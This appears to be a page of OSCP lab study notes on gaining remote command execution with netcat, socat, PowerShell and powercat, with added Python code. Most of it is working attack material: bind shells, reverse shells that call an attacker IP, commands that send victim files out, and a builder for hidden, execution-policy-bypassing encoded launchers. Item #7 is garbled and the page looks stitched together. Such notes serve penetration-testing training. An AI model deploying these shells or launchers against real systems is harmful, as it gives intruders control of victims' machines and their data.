Ahmed.Attia

Offensive Security Certified Professional / OSCP | Module 5 - Intro to bash scripting

Intro to bash scripting. Offensive Security Certified Professional (OSCP) video series by Ahmed: https://www.linkedin.com/in/limbo0x01/ https://twitter.com/L...
I did a summary of the commands as you said; maybe anyone can benefit from them. Thanks @Limbo
#خليك_اسطوره (Arabic: "stay a legend")


Exercise commands (questions & answers)



Lab configuration

Attacker: 192.168.10.51
Victim (Linux): 192.168.10.52
Victim (Windows): 192.168.10.50

---------------------------------------------------------------------------------------------------------------------------------
#1. Connect to a port using nc & socat

using netcat

victim (listener, start this first):
nc -nlvp 4444

attacker (client):
nc -nv 192.168.10.52 4444

using socat

victim (listener, start this first):
socat -ddd tcp4-listen:4444 stdout

attacker (client):
socat -dd - tcp4:192.168.10.52:4444

Note: -dd / -ddd only raise socat's verbosity. The stdout address is write-only, so the listener above can only display what the attacker types; use - (STDIO) instead of stdout on both ends if you want a two-way chat.



---------------------------------------------------------------------------------------------------------------------------------
#2. Send a file using nc & socat

netcat:

victim (sends the file, start this first):
nc -nlvp 4444 < ~/Desktop/latest/rtl8821CU/wlan0dhcp

attacker (receives it):
nc -nv 192.168.10.52 4444 > abc

******
socat:

server (sends the file, start this first):
socat tcp4-listen:4444,fork file:$HOME/Desktop/file.txt

client (receives it):
socat tcp4:192.168.10.52:4444 file:abc.txt,create

Note: socat does not expand ~ inside an address, so give the full path (or $HOME, which the shell expands before socat sees it). Neither tool tells you whether the whole file arrived; compare the checksum of both copies (sha256sum) after the transfer.
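Added example (my own Python, not code from the post or from the OSCP course): a loopback model of the netcat transfer above, where the listener pushes the file and the client writes whatever arrives to disk, followed by the sha256 comparison a practitioner does on both ends. The file names wlan0dhcp and abc stand in for the page's paths; the truncate_after parameter is this example's own assumption, simulating the listener dying mid-transfer, which is exactly the case the checksum comparison catches and a silent "nc -nv ... > abc" does not.

```python
import hashlib
import os
import socket
import tempfile
import threading


def sha256_of(path):
    """Hex SHA-256 of a file: the value `sha256sum <file>` prints."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def serve_file(listener, path, truncate_after=None):
    """Victim side, the role of `nc -nlvp 4444 < file`: accept one client,
    stream the file, then shut down the write side so the client sees EOF.
    truncate_after (bytes, an assumption of this example) simulates the
    listener dying part-way through the transfer."""
    conn, _ = listener.accept()
    with conn, open(path, "rb") as f:
        data = f.read()
        if truncate_after is not None:
            data = data[:truncate_after]
        conn.sendall(data)
        conn.shutdown(socket.SHUT_WR)
    listener.close()


def fetch_file(host, port, dest):
    """Attacker side, the role of `nc -nv 192.168.10.52 4444 > abc`:
    read until EOF and write everything to dest, no questions asked."""
    with socket.create_connection((host, port)) as c, open(dest, "wb") as out:
        while True:
            chunk = c.recv(65536)
            if not chunk:
                break
            out.write(chunk)


def transfer_and_verify(payload, truncate_after=None):
    """Run one loopback transfer of `payload` and return
    (sender_hash, receiver_hash, hashes_match)."""
    with tempfile.TemporaryDirectory() as d:
        src = os.path.join(d, "wlan0dhcp")  # stand-in for the file on the victim
        dst = os.path.join(d, "abc")        # what `> abc` produces on the attacker
        with open(src, "wb") as f:
            f.write(payload)
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.bind(("127.0.0.1", 0))     # port 0: the OS picks a free port
        listener.listen(1)
        port = listener.getsockname()[1]
        t = threading.Thread(target=serve_file, args=(listener, src, truncate_after))
        t.start()
        fetch_file("127.0.0.1", port, dst)
        t.join()
        sent, got = sha256_of(src), sha256_of(dst)
        return sent, got, sent == got


if __name__ == "__main__":
    _, _, ok = transfer_and_verify(os.urandom(300000))
    print("sha256 match:", ok)
    _, _, ok = transfer_and_verify(os.urandom(300000), truncate_after=4096)
    print("sha256 match after truncated transfer:", ok)
```

The receiver cannot distinguish "sender closed because it finished" from "sender closed because it died"; both look like EOF. That is why the hash on both sides, not the absence of an error, is the completion check.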


---------------------------------------------------------------------------------------------------------------------------------
#3. Bind shell (execute a command on connect) using nc & socat

netcat

victim (start this first):

nc -nlvp 4444 -e /bin/bash

attacker (client):

nc -nv 192.168.10.52 4444

********
socat

victim (start this first):
socat tcp4-listen:4445,fork exec:/bin/bash

attacker (client):
socat - tcp4:192.168.10.52:4445

Note: -e only exists in netcat builds compiled with it (nc.traditional, ncat); the OpenBSD nc shipped by many distributions has no -e. The socat client must use - (STDIO), not stdout: stdout is write-only, so with it your typed commands never reach the shell.


---------------------------------------------------------------------------------------------------------------------------------
#4. Receive a file using powershell

victim (cmd), fetching amr.txt from an HTTP server the attacker is running on port 8000:

powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://192.168.10.51:8000/amr.txt','C:\Users\victim\Desktop\amr2.txt')"





---------------------------------------------------------------------------------------------------------------------------------
#5. Bind shell using powershell

victim (cmd) :
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',4444);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"


attacker:

nc -nv 192.168.10.50 4444



---------------------------------------------------------------------------------------------------------------------------------
#6. Reverse shell using powershell

victim (change the IP and/or port to match your listener, which must already be running):

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.10.51',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

attacker:
nc -nlvp 4444
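Added example (my own Python, not the page's or the course's code): a loopback model of what the PowerShell one-liners in #5 and #6 actually do, so the loop is readable. The victim reads up to 64 KiB, executes it, and sends back stdout+stderr followed by a "PS <cwd>> " prompt until the stream closes; the only difference between the bind shell (#5) and the reverse shell (#6) is which side connects. The function names, the 127.0.0.1 addresses and the sample command "echo hello" are this example's assumptions. It executes whatever text arrives on the socket, so run it only against loopback as written.

```python
import os
import socket
import subprocess
import threading

BUF = 65536  # the one-liners' [byte[]] 0..65535 read buffer


def victim_loop(sock):
    """The while loop of the one-liners: read a command, run it, return
    stdout+stderr followed by a 'PS <cwd>> ' prompt; stop at EOF."""
    with sock:
        while True:
            data = sock.recv(BUF)
            if not data:  # $stream.Read(...) returned 0: attacker went away
                break
            cmd = data.decode("ascii", "replace")
            # `iex $data 2>&1 | Out-String`, modelled with the local shell
            proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
            reply = proc.stdout + proc.stderr + "PS " + os.getcwd() + "> "
            sock.sendall(reply.encode("ascii", "replace"))


def reverse_shell(host, port):
    """Victim side of #6: connect out to the attacker, then serve commands."""
    victim_loop(socket.create_connection((host, port)))


def bind_shell(listener):
    """Victim side of #5: wait for the attacker to connect, then serve commands."""
    conn, _ = listener.accept()
    listener.close()
    victim_loop(conn)


def attacker_session(sock, commands):
    """Attacker side (the nc end): send each command and read until the
    prompt comes back, which is what you see interactively in nc."""
    replies = []
    with sock:
        for cmd in commands:
            sock.sendall(cmd.encode("ascii"))
            got = b""
            while not got.endswith(b"> "):
                chunk = sock.recv(BUF)
                if not chunk:
                    break
                got += chunk
            replies.append(got.decode("ascii", "replace"))
    return replies


def _loopback_listener():
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # port 0: the OS picks a free port
    srv.listen(1)
    return srv, srv.getsockname()[1]


def demo_reverse(commands):
    """#6 on loopback: attacker listens (nc -nlvp 4444), victim connects out."""
    srv, port = _loopback_listener()
    t = threading.Thread(target=reverse_shell, args=("127.0.0.1", port))
    t.start()
    conn, _ = srv.accept()
    srv.close()
    replies = attacker_session(conn, commands)
    t.join()
    return replies


def demo_bind(commands):
    """#5 on loopback: victim listens, attacker connects (nc -nv ... 4444)."""
    srv, port = _loopback_listener()
    t = threading.Thread(target=bind_shell, args=(srv,))
    t.start()
    replies = attacker_session(socket.create_connection(("127.0.0.1", port)), commands)
    t.join()
    return replies


if __name__ == "__main__":
    for reply in demo_reverse(["echo hello", "echo again"]):
        print(reply)
```

The "shell" is nothing more than this read/execute/write loop, which is also why every command and every result crosses the wire in clear text and why a network sensor sees the "PS C:\...> " prompt string in the payload.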


---------------------------------------------------------------------------------------------------------------------------------
#7. Bind shell using powercat (powercat.ps1 must already be loaded into the victim's PowerShell session, e.g. by dot-sourcing it)

victack

---------------------------------------------------------------------------------------------------------------------------------
#8. Reverse shell using powercat

attacker (start this first):

nc -nlvp 4444

victim:

powercat -c 192.168.10.51 -p 4444 -e cmd.exe


---------------------------------------------------------------------------------------------------------------------------------
#9. Encoding the reverse-shell command with the python tool (the generated line is run on the victim's cmd)

./reversesg.py 192.168.10.51 4444

powershell -NoP -NonI -W Hidden -Exec Bypass -e <base64-encoded command>

Note: the flags are -NoProfile, -NonInteractive, -WindowStyle Hidden, -ExecutionPolicy Bypass and -EncodedCommand. -e expects base64 of the script's UTF-16LE bytes, not of its UTF-8 text.
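Added example (my own Python, not the reversesg.py tool from the post): what such a tool has to do to produce the -e argument. PowerShell's -EncodedCommand takes base64 of the script encoded as UTF-16LE, so a plain base64 of the UTF-8 text is rejected; the decoder is the same operation in reverse, which is why -e hides nothing from anyone reading process-creation logs. The function names and the {host}/{port} placeholders are this example's assumptions; the template is the reverse-shell one-liner from #6 on this page.

```python
import base64

# Reverse-shell one-liner from #6 on this page, with the attacker host/port
# left as placeholders that build_launcher() fills in (braces doubled for str.format).
REVERSE_SHELL_TEMPLATE = (
    "$client = New-Object System.Net.Sockets.TCPClient('{host}',{port});"
    "$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};"
    "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;"
    "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);"
    "$sendback = (iex $data 2>&1 | Out-String );"
    "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';"
    "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);"
    "$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()"
)


def encode_powershell_command(script):
    """Value for -EncodedCommand / -e: base64 of the script's UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_powershell_command(blob):
    """Reverse it, as a defender does with a -e argument from a command line log."""
    return base64.b64decode(blob).decode("utf-16le")


def build_launcher(host, port):
    """Assemble the launcher line from #9 for the given attacker host and port."""
    script = REVERSE_SHELL_TEMPLATE.format(host=host, port=port)
    return "powershell -NoP -NonI -W Hidden -Exec Bypass -e " + encode_powershell_command(script)


if __name__ == "__main__":
    # Sanity check against a known value: "dir" encodes to ZABpAHIA
    print(encode_powershell_command("dir"))
    line = build_launcher("192.168.10.51", 4444)
    print(line)
    print(decode_powershell_command(line.split(" -e ")[1]))
```

Run the decoder over any "powershell ... -e <blob>" you find in a process log; the UTF-16LE requirement is the reason a generic base64 decode of the blob shows the script interleaved with NUL bytes.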
--------------------------------------------------------------------------------------------------------------------------------------------------------
#10. Sending a file from the victim's machine to our machine (start the attacker's listener first)


victim

powercat -c 192.168.10.51 -p 8000 -i C:\Users\victim\Desktop\amr2.ps


attacker (just listening):
nc -nlvp 8000 > aaaaa.txt
 

Media information: album OSCP, added by Ahmed.Attia